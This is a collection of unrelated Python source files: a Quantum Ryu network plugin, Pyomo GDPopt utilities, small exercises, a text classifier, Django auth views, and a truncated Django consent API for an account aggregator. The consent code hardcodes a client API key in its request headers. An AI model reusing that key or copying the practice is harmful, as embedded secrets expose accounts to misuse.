net_id, tunnel_key):\n self.client.create_network(net_id)\n self.tun_client.create_tunnel_key(net_id, tunnel_key)\n\n def _client_delete_network(self, net_id):\n client.ignore_http_not_found(\n lambda: self.client.delete_network(net_id))\n client.ignore_http_not_found(\n lambda: self.tun_client.delete_tunnel_key(net_id))\n\n def create_network(self, context, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).create_network(context,\n network)\n self._process_l3_create(context, network['network'], net['id'])\n self._extend_network_dict_l3(context, net)\n\n tunnel_key = self.tunnel_key.allocate(session, net['id'])\n try:\n self._client_create_network(net['id'], tunnel_key)\n except:\n self._client_delete_network(net['id'])\n raise\n\n return net\n\n def update_network(self, context, id, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).update_network(context, id,\n network)\n self._process_l3_update(context, network['network'], id)\n self._extend_network_dict_l3(context, net)\n return net\n\n def delete_network(self, context, id):\n self._client_delete_network(id)\n session = context.session\n with session.begin(subtransactions=True):\n self.tunnel_key.delete(session, id)\n super(RyuQuantumPluginV2, self).delete_network(context, id)\n\n def get_network(self, context, id, fields=None):\n net = super(RyuQuantumPluginV2, self).get_network(context, id, None)\n self._extend_network_dict_l3(context, net)\n return self._fields(net, fields)\n\n def get_networks(self, context, filters=None, fields=None):\n nets = super(RyuQuantumPluginV2, self).get_networks(context, filters,\n None)\n for net in nets:\n self._extend_network_dict_l3(context, net)\n nets = self._filter_nets_l3(context, nets, filters)\n\n return [self._fields(net, fields) for net in nets]\n\n def delete_port(self, context, id, l3_port_check=True):\n with context.session.begin(subtransactions=True):\n port = self._get_port(context, id)\n net_id = port.network_id\n try:\n port_binding = db_api_v2.port_binding_destroy(context.session,\n port.id, net_id)\n datapath_id = port_binding.dpid\n port_no = port_binding.port_no\n ignore_http_not_found(\n lambda: self.client.delete_port(net_id, datapath_id,\n port_no))\n except q_exc.PortNotFound:\n pass\n\n # if needed, check to see if this is a port owned by\n # and l3-router. If so, we should prevent deletion.\n if l3_port_check:\n self.prevent_l3_port_deletion(context, id)\n self.disassociate_floatingips(context, id)\n return super(RyuQuantumPluginV2, self).delete_port(context, id)\n\n def update_port(self, context, id, port):\n p = super(RyuQuantumPluginV2, self).update_port(context, id, port)\n net_id = p['network_id']\n mac_address = p['mac_address']\n\n deleted = port['port'].get('deleted', False)\n if deleted:\n session = context.session\n try:\n db_api_v2.port_binding_destroy(session, id, net_id)\n except q_exc.PortNotFound:\n pass\n db_api_v2.set_port_status(session, id, q_const.PORT_STATUS_DOWN)\n return p\n\n datapath_id = port['port'].get('datapath_id', None)\n port_no = port['port'].get('port_no', None)\n if datapath_id is None or port_no is None:\n LOG.debug('p %s', p)\n return p\n\n try:\n port_binding = db_api_v2.port_binding_get(id, net_id)\n except orm_exc.NoResultFound:\n try:\n db_api_v2.port_binding_create(id, net_id, datapath_id, port_no)\n except IntegrityError:\n # TODO:XXX should do transaction?\n return p\n else:\n self.client.create_port(net_id, datapath_id, port_no)\n self.client.create_mac(net_id, datapath_id, port_no,\n mac_address)\n else:\n if (port_binding.dpid != datapath_id or\n port_binding.port_no != port_no):\n variables = {'datapath_id': datapath_id,\n 'port_no': port_no,\n 'port_binding_dpid': port_binding.dpid,\n 'port_binding_port_no': port_binding.port_no}\n raise q_exc.InvalidInput(\n error_message=_('invalid (datapath_id, port_no) '\n 'is requested'\n '(%(datapath_id)s, %(port_no)s), acutal'\n '(%(port_binding_dpid)s, '\n '%(port_binding_port_no)s)') % variables)\n self.client.update_network(net_id)\n self.client.update_port(net_id, datapath_id, port_no)\n self.client.update_mac(net_id, datapath_id, port_no, mac_address)\n return p\n","repo_name":"virt2x/folsomCloud","sub_path":"cloud/quantum/quantum/plugins/ryu/ryu_quantum_plugin.py","file_name":"ryu_quantum_plugin.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"29699440561","text":"\"\"\"Utility functions and classes for the GDPopt solver.\"\"\"\nfrom __future__ import division\n\nimport logging\nfrom math import fabs, floor, log\n\nfrom pyomo.core import (Any, Binary, Block, Constraint, NonNegativeReals,\n Objective, Reals, Var, minimize, value)\nfrom pyomo.core.expr import current as EXPR\nfrom pyomo.core.kernel import ComponentSet\nfrom pyomo.gdp import Disjunct, Disjunction\nfrom pyomo.opt import SolverFactory\nfrom pyomo.opt.results import ProblemSense, SolverResults\n\n\nclass _DoNothing(object):\n \"\"\"Do nothing, literally.\n\n This class is used in situations of \"do something if attribute exists.\"\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\n def __getattr__(self, attr):\n def _do_nothing(*args, **kwargs):\n pass\n return _do_nothing\n\n\nclass GDPoptSolveData(object):\n \"\"\"Data container to hold solve-instance data.\n\n Key attributes:\n - original_model: the original model that the user gave us to solve\n - working_model: the original model after preprocessing\n - linear_GDP: the linear-discrete master problem\n\n \"\"\"\n pass\n\n\ndef model_is_valid(solve_data, config):\n \"\"\"Validate that the model is solveable by GDPopt.\n\n Also preforms some preprocessing such as moving the objective to the\n constraints.\n\n \"\"\"\n m = solve_data.working_model\n GDPopt = m.GDPopt_utils\n\n # Handle LP/NLP being passed to the solver\n prob = solve_data.results.problem\n if (prob.number_of_binary_variables == 0 and\n prob.number_of_integer_variables == 0 and\n prob.number_of_disjunctions == 0):\n config.logger.info('Problem has no discrete decisions.')\n if len(GDPopt.working_nonlinear_constraints) > 0:\n config.logger.info(\n \"Your model is an NLP (nonlinear program). \"\n \"Using NLP solver %s to solve.\" % config.nlp)\n SolverFactory(config.nlp).solve(\n solve_data.original_model, **config.nlp_options)\n return False\n else:\n config.logger.info(\n \"Your model is an LP (linear program). \"\n \"Using LP solver %s to solve.\" % config.mip)\n SolverFactory(config.mip).solve(\n solve_data.original_model, **config.mip_options)\n return False\n\n # Handle missing or multiple objectives\n objs = list(m.component_data_objects(\n ctype=Objective, active=True, descend_into=True))\n num_objs = len(objs)\n solve_data.results.problem.number_of_objectives = num_objs\n if num_objs == 0:\n config.logger.warning(\n 'Model has no active objectives. Adding dummy objective.')\n GDPopt.dummy_objective = Objective(expr=1)\n main_obj = GDPopt.dummy_objective\n elif num_objs > 1:\n raise ValueError('Model has multiple active objectives.')\n else:\n main_obj = objs[0]\n solve_data.working_objective_expr = main_obj.expr\n\n # Move the objective to the constraints\n\n # TODO only move the objective if nonlinear?\n GDPopt.objective_value = Var(domain=Reals, initialize=0)\n solve_data.objective_sense = main_obj.sense\n if main_obj.sense == minimize:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value >= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.minimize\n else:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value <= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.maximize\n main_obj.deactivate()\n GDPopt.objective = Objective(\n expr=GDPopt.objective_value, sense=main_obj.sense)\n\n # TODO if any continuous variables are multipled with binary ones, need\n # to do some kind of transformation (Glover?) or throw an error message\n return True\n\n\ndef a_logger(str_or_logger):\n \"\"\"Returns a logger when passed either a logger name or logger object.\"\"\"\n if isinstance(str_or_logger, logging.Logger):\n return str_or_logger\n else:\n return logging.getLogger(str_or_logger)\n\n\ndef copy_var_list_values(from_list, to_list, config, skip_stale=False):\n \"\"\"Copy variable values from one list to another.\"\"\"\n for v_from, v_to in zip(from_list, to_list):\n if skip_stale and v_from.stale:\n continue # Skip stale variable values.\n try:\n v_to.set_value(value(v_from, exception=False))\n if skip_stale:\n v_to.stale = False\n except ValueError as err:\n if 'is not in domain Binary' in err.message:\n # Check to see if this is just a tolerance issue\n v_from_val = value(v_from, exception=False)\n if (fabs(v_from_val - 1) <= config.integer_tolerance or\n fabs(v_from_val) <= config.integer_tolerance):\n v_to.set_value(round(v_from_val))\n else:\n raise\n\n\ndef is_feasible(model, config):\n \"\"\"Checks to see if the algebraic model is feasible in its current state.\n\n Checks variable bounds and active constraints. Not for use with\n untransformed GDP models.\n\n \"\"\"\n disj = next(model.component_data_objects(\n ctype=Disjunct, active=True), None)\n if disj is not None:\n raise NotImplementedError(\n \"Found active disjunct %s. \"\n \"This function is not intended to check \"\n \"feasibility of disjunctive models, \"\n \"only transformed subproblems.\" % disj.name)\n\n config.logger.debug('Checking if model is feasible.')\n for constr in model.component_data_objects(\n ctype=Constraint, active=True, descend_into=True):\n # Check constraint lower bound\n if (constr.lower is not None and (\n value(constr.lower) - value(constr.body)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s < LB %s' % (\n constr.name, value(constr.body), value(constr.lower)))\n return False\n # check constraint upper bound\n if (constr.upper is not None and (\n value(constr.body) - value(constr.upper)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s > UB %s' % (\n constr.name, value(constr.body), value(constr.upper)))\n return False\n for var in model.component_data_objects(ctype=Var, descend_into=True):\n # Check variable lower bound\n if (var.has_lb() and\n value(var.lb) - value(var) >= config.variable_tolerance):\n config.logger.info('%s: %s < LB %s' % (\n var.name, value(var), value(var.lb)))\n return False\n # Check variable upper bound\n if (var.has_ub() and\n value(var) - value(var.ub) >= config.variable_tolerance):\n config.logger.info('%s: %s > UB %s' % (\n var.name, value(var), value(var.ub)))\n return False\n config.logger.info('Model is feasible.')\n return True\n\n\ndef clone_orig_model_with_lists(original_model):\n \"\"\"Clones the original model to create a working model.\n\n Also attaches ordered lists of the variables, constraints, disjuncts, and\n disjunctions to the model so that they can be used for mapping back and\n forth.\n\n \"\"\"\n build_ordered_component_lists(original_model, prefix='orig')\n return original_model.clone()\n\n\ndef build_ordered_component_lists(model, prefix='working'):\n \"\"\"Define lists used for future data transfer.\"\"\"\n GDPopt = model.GDPopt_utils\n var_set = ComponentSet()\n setattr(\n GDPopt, '%s_constraints_list' % prefix, list(\n model.component_data_objects(\n ctype=Constraint, active=True,\n descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjuncts_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunct, descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjunctions_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunction, active=True,\n descend_into=(Disjunct, Block))))\n\n # Identify the non-fixed variables in (potentially) active constraints\n for constr in getattr(GDPopt, '%s_constraints_list' % prefix):\n for v in EXPR.identify_variables(constr.body, include_fixed=False):\n var_set.add(v)\n # Disjunct indicator variables might not appear in active constraints. In\n # fact, if we consider them Logical variables, they should not appear in\n # active algebraic constraints. For now, they need to be added to the\n # variable set.\n for disj in getattr(GDPopt, '%s_disjuncts_list' % prefix):\n var_set.add(disj.indicator_var)\n\n # We use component_data_objects rather than list(var_set) in order to\n # preserve a deterministic ordering.\n setattr(\n GDPopt, '%s_var_list' % prefix, list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v in var_set))\n setattr(\n GDPopt, '%s_nonlinear_constraints' % prefix, [\n v for v in getattr(GDPopt, '%s_constraints_list' % prefix)\n if v.body.polynomial_degree() not in (0, 1)])\n\n\ndef record_original_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for original model and setup SolverResults.\"\"\"\n # Create the solver results object\n res = solve_data.results = SolverResults()\n prob = res.problem\n origGDPopt = solve_data.original_model.GDPopt_utils\n res.problem.name = solve_data.working_model.name\n res.problem.number_of_nonzeros = None # TODO\n # TODO work on termination condition and message\n res.solver.termination_condition = None\n res.solver.message = None\n # TODO add some kind of timing\n res.solver.user_time = None\n res.solver.system_time = None\n res.solver.wallclock_time = None\n res.solver.termination_message = None\n\n # Classify the variables\n orig_binary = sum(1 for v in origGDPopt.orig_var_list if v.is_binary())\n orig_continuous = sum(\n 1 for v in origGDPopt.orig_var_list if v.is_continuous())\n orig_integer = sum(1 for v in origGDPopt.orig_var_list if v.is_integer())\n\n # Get count of constraints and variables\n prob.number_of_constraints = len(origGDPopt.orig_constraints_list)\n prob.number_of_disjunctions = len(origGDPopt.orig_disjunctions_list)\n prob.number_of_variables = len(origGDPopt.orig_var_list)\n prob.number_of_binary_variables = orig_binary\n prob.number_of_continuous_variables = orig_continuous\n prob.number_of_integer_variables = orig_integer\n\n config.logger.info(\n \"Original model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary, %s are integer, \"\n \"and %s are continuous.\" %\n (prob.number_of_constraints,\n len(origGDPopt.orig_nonlinear_constraints),\n prob.number_of_disjunctions,\n prob.number_of_variables,\n orig_binary,\n orig_integer,\n orig_continuous))\n\n\ndef record_working_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for preprocessed model.\"\"\"\n GDPopt = solve_data.working_model.GDPopt_utils\n now_binary = sum(1 for v in GDPopt.working_var_list if v.is_binary())\n now_continuous = sum(\n 1 for v in GDPopt.working_var_list if v.is_continuous())\n now_integer = sum(1 for v in GDPopt.working_var_list if v.is_integer())\n assert now_integer == 0, \"Unreformulated, unfixed integer variables found.\"\n\n config.logger.info(\n \"After preprocessing, model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary and %s are continuous.\" %\n (len(GDPopt.working_constraints_list),\n len(GDPopt.working_nonlinear_constraints),\n len(GDPopt.working_disjunctions_list),\n len(GDPopt.working_var_list),\n now_binary,\n now_continuous))\n\n\ndef reformulate_integer_variables(model, config):\n integer_vars = list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v.is_integer() and not v.fixed)\n if len(integer_vars) == 0:\n return # if no free integer variables, no reformulation needed.\n\n if config.reformulate_integer_vars_using is None:\n config.logger.warning(\n \"Model contains unfixed integer variables. \"\n \"GDPopt will reformulate using base 2 binary variables \"\n \"by default. To specify a different method, see the \"\n \"reformulate_integer_vars_using configuration option.\")\n config.reformulate_integer_vars_using = 'base2_binary'\n\n config.logger.info(\n \"Reformulating integer variables using the %s strategy.\"\n % config.reformulate_integer_vars_using)\n\n # Set up reformulation block\n reform_block = model.GDPopt_utils.integer_reform = Block(\n doc=\"Holds variables and constraints for reformulating \"\n \"integer variables to binary variables.\")\n reform_block.new_binary_var = Var(\n Any, domain=Binary, dense=False,\n doc=\"Binary variable with index (int_var.name, indx)\")\n reform_block.integer_to_binary_constraint = Constraint(\n Any, doc=\"Equality constraints mapping the binary variable values \"\n \"to the integer variable value.\")\n\n # check that variables are bounded and non-negative\n for int_var in integer_vars:\n if not (int_var.has_lb() and int_var.has_ub()):\n raise ValueError(\n \"Integer variable %s is missing an \"\n \"upper or lower bound. LB: %s; UB: %s. \"\n \"GDPopt does not support unbounded integer variables.\"\n % (int_var.name, int_var.lb, int_var.ub))\n if int_var.lb < 0:\n raise ValueError(\n \"Integer variable %s can be negative. \"\n \"GDPopt currently only supports positive integer \"\n \"variables.\" % (int_var.name)\n )\n # do the reformulation\n highest_power = floor(log(value(int_var.ub), 2))\n var_name = int_var.name\n reform_block.integer_to_binary_constraint.add(\n var_name, expr=int_var == sum(\n reform_block.new_binary_var[var_name, pwr] * (2 ** pwr)\n for pwr in range(0, int(highest_power) + 1)))\n int_var.domain = NonNegativeReals\n\n config.logger.info(\n \"Reformulated %s integer variables using \"\n \"%s binary variables and %s constraints.\"\n % (len(integer_vars), len(reform_block.new_binary_var),\n len(reform_block.integer_to_binary_constraint)))\n\n\ndef validate_disjunctions(model, config):\n \"\"\"Validate that the active disjunctions on the model are satisfied\n by the current disjunct indicator_var values.\"\"\"\n active_disjunctions = model.component_data_objects(\n ctype=Disjunction, active=True, descend_into=(Block, Disjunct))\n for disjtn in active_disjunctions:\n sum_disj_vals = sum(disj.indicator_var.value\n for disj in disjtn.disjuncts)\n if disjtn.xor and fabs(sum_disj_vals - 1) > config.integer_tolerance:\n raise ValueError(\n \"Expected disjunct values to add up to 1 \"\n \"for XOR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n elif sum_disj_vals + config.integer_tolerance < 1:\n raise ValueError(\n \"Expected disjunct values to add up to at least 1 for \"\n \"OR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n\n\ndef algorithm_is_making_progress(solve_data, config):\n \"\"\"Make sure that the algorithm is making sufficient progress\n at each iteration to continue.\"\"\"\n\n # TODO if backtracking is turned on, and algorithm visits the same point\n # twice without improvement in objective value, turn off backtracking.\n\n # TODO stop iterations if feasible solutions not progressing for a number\n # of iterations.\n\n # If the hybrid algorithm is not making progress, switch to OA.\n # required_feas_prog = 1E-6\n # if solve_data.working_model.GDPopt_utils.objective.sense == minimize:\n # sign_adjust = 1\n # else:\n # sign_adjust = -1\n\n # Maximum number of iterations in which feasible bound does not\n # improve before terminating algorithm\n # if (len(feas_prog_log) > config.algorithm_stall_after and\n # (sign_adjust * (feas_prog_log[-1] + required_feas_prog)\n # >= sign_adjust *\n # feas_prog_log[-1 - config.algorithm_stall_after])):\n # config.logger.info(\n # 'Feasible solutions not making enough progress '\n # 'for %s iterations. Algorithm stalled. Exiting.\\n'\n # 'To continue, increase value of parameter '\n # 'algorithm_stall_after.'\n # % (config.algorithm_stall_after,))\n # return False\n\n return True\n\n\ndef algorithm_should_terminate(solve_data, config):\n \"\"\"Check if the algorithm should terminate.\n\n Termination conditions based on solver options and progress.\n\n \"\"\"\n # Check bound convergence\n if solve_data.LB + config.bound_tolerance >= solve_data.UB:\n config.logger.info(\n 'GDPopt exiting on bound convergence. '\n 'LB: %s + (tol %s) >= UB: %s' %\n (solve_data.LB, config.bound_tolerance,\n solve_data.UB))\n return True\n\n # Check iteration limit\n if solve_data.master_iteration >= config.iterlim:\n config.logger.info(\n 'GDPopt unable to converge bounds '\n 'after %s master iterations.'\n % (solve_data.master_iteration,))\n config.logger.info(\n 'Final bound values: LB: %s UB: %s'\n % (solve_data.LB, solve_data.UB))\n return True\n\n if not algorithm_is_making_progress(solve_data, config):\n config.logger.debug(\n 'Algorithm is not making enough progress. '\n 'Exiting iteration loop.')\n return True\n return False\n\n\ndef copy_and_fix_mip_values_to_nlp(var_list, val_list, config):\n \"\"\"Copy MIP solution values to the corresponding NLP variable list.\n\n Fix binary variables and optionally round their values.\n\n \"\"\"\n for var, val in zip(var_list, val_list):\n if val is None:\n continue\n if not var.is_binary():\n var.value = val\n elif ((fabs(val) > config.integer_tolerance and\n fabs(val - 1) > config.integer_tolerance)):\n raise ValueError(\n \"Binary variable %s value %s is not \"\n \"within tolerance %s of 0 or 1.\" %\n (var.name, var.value, config.integer_tolerance))\n else:\n # variable is binary and within tolerances\n if config.round_NLP_binaries:\n var.fix(int(round(val)))\n else:\n var.fix(val)\n","repo_name":"rowhit/pyomo","sub_path":"pyomo/contrib/gdpopt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"14744232404","text":"# Game, Set, Match\n\n\nimport csv\n\n\ndef main():\n # Read the CSV file\n data = read_csv_file(\"wimbledon.csv\")\n\n # Get the champions and the number of times they have won\n champions = get_champions(data)\n\n # Display the champions and the number of times they have won\n print(\"Wimbledon Champions:\")\n for name, count in champions.items():\n print(f\"{name} {count}\")\n\n # Get the countries of the champions\n countries = get_countries(data)\n\n # Display the countries of the champions in alphabetical order\n print(\"\\nThese\", len(countries), \"countries have won Wimbledon:\")\n print(\", \".join(sorted(countries)))\n\n\ndef read_csv_file(filename):\n \"\"\"\n Reads a CSV file and returns its contents as a list of lists.\n \"\"\"\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n reader = csv.reader(in_file)\n return [row for row in reader]\n\n\ndef get_champions(data):\n \"\"\"\n Returns a dictionary containing the champions and the number of times they have won.\n \"\"\"\n champions = {}\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n name = row[2]\n champions[name] = champions.get(name, 0) + 1\n return champions\n\n\ndef get_countries(data):\n \"\"\"\n Returns a set of the countries of the champions.\n \"\"\"\n countries = set()\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n country = row[1]\n countries.add(country)\n return countries\n\n\nmain()\n","repo_name":"tamil290/CP1404","sub_path":"Practical_5/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4246647109","text":"\n \n\n# create a random dictionary of words and their definitions\nimport profile\n\n\nports_protocols = {\n \"21\": \"FTP\",\n \"22\": \"SSH\",\n \"23\": \"TELNET\",\n \"25\": \"SMTP\",\n \"53\": \"DNS\",\n \"80\": \"HTTP\",\n \"443\": \"HTTPS\",\n \"3306\": \"MYSQL\",\n \"5432\": \"POSTGRESQL\"}\n\nfrom memory_profiler import profile\nimport timeit\n\n@profile(precision=2)\ndef create_dictionary():\n words = ['apple', 'banana', 'orange', 'coconut', 'strawberry', 'lime', 'grapefruit', 'lemon', 'kumquat', 'blueberry', 'melon']\n dictionary = {}\n for word in words:\n definition = word + \" is a fruit.\"\n dictionary[word] = definition\n return dictionary # return the dictionary\n\n\nprint(timeit.timeit(\"create_dictionary()\", setup=\"from __main__ import create_dictionary\",number=1))\n\n# for x in dict1:\n# print(x, dict1[x])","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"Individual Functions Practice/memory_profiler.py","file_name":"memory_profiler.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"1148001315","text":"batch_size = 128\nalpha_channels = 3\nwidth = 16\nheight = 16\n\nfilter_height = 5\nfilter_width = filter_height\nconvolutional_channels = 6\nconvolutional_skip = 2\npool_skip = 2\n# from get_bottleneck_data import TOP_CLASSES\n# len(TOP_CLASSES)\nnum_targets = 1623 + 1\nlearning_rate = 0.01\nnum_steps = 5000\n\nnum_bottlenecks = 1001\n","repo_name":"joshbrowning2358/cDiscount","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3937079214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:07:16 2018\n\n@author: dadangewp\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfrom dataReader import parse_training\nfrom dataReader import parse_testing\nimport configFeature as cfgFeature\nimport featureManager\nfrom sklearn import svm\nfrom sklearn import tree\nfrom sklearn import metrics\nfrom sklearn.metrics.scorer import make_scorer\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\n\n\nDIR_TRAIN = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_training_taskb.tsv\"\nDIR_TEST = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_testing_taskb_linear.tsv\"\n\noriginalclass = []\npredictedclass = []\n\ndef classification_report_with_accuracy_score(y_true, y_pred):\n #print (classification_report(y_true, y_pred)) # print classification report\n originalclass.extend(y_true)\n predictedclass.extend(y_pred)\n return accuracy_score(y_true, y_pred) # return accuracy score\n\nif __name__ == '__main__':\n \n print (\"started ...\")\n TASK = \"B-English\" # Define, A or B\n FNAME = './predictions-task' + TASK + '.txt'\n PREDICTIONSFILE = open(FNAME, \"w\")\n # read Training data\n #print (\"load wordvector\")\n #word2vec = gensim.models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)\n #word2vec = dict(zip(model.wv.index2word, model.wv.syn0))\n #print (\"wordvector load finished\")\n word2vec = \"zonk\"\n feature_manager=featureManager.make_feature_manager()\n dataTrain, dataLabel = parse_training(DIR_TRAIN)\n dataTest = parse_testing(DIR_TEST)\n print (\"Training data read\") \n feature_names=cfgFeature.feature_list['feature_names']\n #stuff = range(0, len(feature_names) )\n #parameters=[]\n #parameters_optimized=[]\n #highest=0\n #max_feature_set=[]\n #for L in range(1, len(stuff)+1):\n #for subset in combinations(stuff, L):\n #X_train,X_test=feature_manager.create_feature_space(dataTrain, word2vec, feature_names[list(subset)], train_tweets=None)\n #clf = svm.LinearSVC()\n #print (\"training start\")\n #clf.fit(X_train, dataLabel)\n #print (\"training done\")\n #scores = cross_val_score(clf, X_train, dataLabel, cv=10) \n #acc = scores.mean()\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n #score = metrics.f1_score(dataLabel, predicted, pos_label=1)\n #print(feature_names[list(subset)])\n #print(score)\n #if score > 0.65:\n #print(str(feature_names[list(subset)]))\n #PREDICTIONSFILE.write(str(feature_names[list(subset)])+\";\")\n #print(score)\n #PREDICTIONSFILE.write(str(score))\n #PREDICTIONSFILE.write(\"\\n\")\n X_train, X_test = feature_manager.create_feature_space(dataTrain, dataTest, feature_names)\n #print (X_train.shape)\n #print (X_test.shape)\n clf = svm.LinearSVC()\n clf.fit(X_train,dataLabel)\n \n #print(cross_val_score(clf, X_train, dataLabel, cv=10, scoring=\"accuracy\"))\n scores = cross_val_score(clf, X_train, dataLabel, cv=10, scoring=make_scorer(f1_score, average='macro'))\n print(scores)\n print(\"Accuracy (Cross-V): %0.3f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n #nested_score = cross_val_score(clf, X=X_train, y=dataLabel, cv=10, \\\n # scoring=make_scorer(classification_report_with_accuracy_score))\n #print(classification_report(originalclass, predictedclass, digits=3))\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n predicted = clf.predict(X_test)\n #score = metrics.f1_score(labelTest, predicted, pos_label=1)\n #scoreTrain = metrics.f1_score(dataLabel, predictedTrain, pos_label=1)\n #print (\"F1-score Task\", TASK, score)\n #print (scoreTrain)\n for p in predicted:\n PREDICTIONSFILE.write(\"{}\\n\".format(p))\n PREDICTIONSFILE.close()\n ","repo_name":"dadangewp/misogyny-project","sub_path":"IberEval_Misogyny-Detection-LinearSVC/misogyny_TaskA.py","file_name":"misogyny_TaskA.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18523130874","text":"from django.shortcuts import render, redirect\nfrom .forms import RegisterForm, LoginForm\nfrom django.contrib.auth import login\nfrom django.contrib.auth import logout\n\n\ndef user_login(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n login(request, form.user_cache)\n return redirect(\"blog:index\")\n else:\n form = LoginForm()\n return render(request, \"login_and_register/login.html\", {\"form\": form})\n\n\ndef user_register(request):\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"login_and_register:login\")\n\n # form.save()\n else:\n form = RegisterForm()\n\n return render(request, \"login_and_register/register.html\", {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect(\"blog:index\")\n\n","repo_name":"radgra/django_blog","sub_path":"login_and_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"21129810900","text":"arr = [1, 2, 3]\n\nN = 3#len arr\n\n#사용한 결과물을 담는 데이터\nsel = [0] * N#결과들이 저장될 리스트\ncheck = [0] * N#해당 원소를 이미 사용했는지 안 했는지에 대한 체크\n\ndef comb(idx):\n if idx == N:\n print(sel)\n return\n for i in range(idx, N):\n if not check[i]:\n check[i] = True\n sel[i] = arr[i]\n comb(i+1)\ncomb(0)\n","repo_name":"Gyujeong-Lee/Algorithm_study","sub_path":"0419/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33924653329","text":"import json\nfrom django.shortcuts import render\nfrom requests.api import request\nfrom rest_framework import serializers\nfrom rest_framework.response import Response\nimport codecs\nimport requests\nimport jwt\nimport uuid\nfrom datetime import datetime\nimport time\nfrom django.views import View\nfrom rest_framework.serializers import Serializer\nfrom rest_framework.views import APIView\nimport requests\nimport logging\nimport base64\nfrom http.client import HTTPConnection # py3\nfrom .serializer import UserSerializer, TransactionSerializer, GoalSerializer\nfrom .models import User, Transaction, Goal\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, UpdateAPIView, DestroyAPIView, RetrieveUpdateAPIView\n\n\nclass createConsent(APIView):\n\n def post(self, request):\n mobileNumber = request.data.get(\"mobile\")\n body = createData(mobileNumber)\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, body)\n url = \"https://aa-sandbox.setu.co/Consent\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.post(url, headers=headers, json=body)\n response = response.json()\n resUrl = \"https://anumati.setu.co/\" + response[\"ConsentHandle\"] + \\\n \"?redirect_url=http://484c-103-250-137-194.ngrok.io/redirect/\"\n return Response(resUrl)\n\n\nclass consentNotification(APIView):\n def post(self, request):\n consentId = request.data.get(\n \"ConsentStatusNotification\").get(\"consentId\")\n consentStatus = request.data.get(\n \"ConsentStatusNotification\").get(\"consentStatus\")\n if consentStatus == \"ACTIVE\":\n fetchSignedConsent(consentId)\n dateNow = datetime\n res = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"response\": \"OK\",\n }\n return Response(res)\n\n\ndef createData(mobileNumber):\n dateNow = 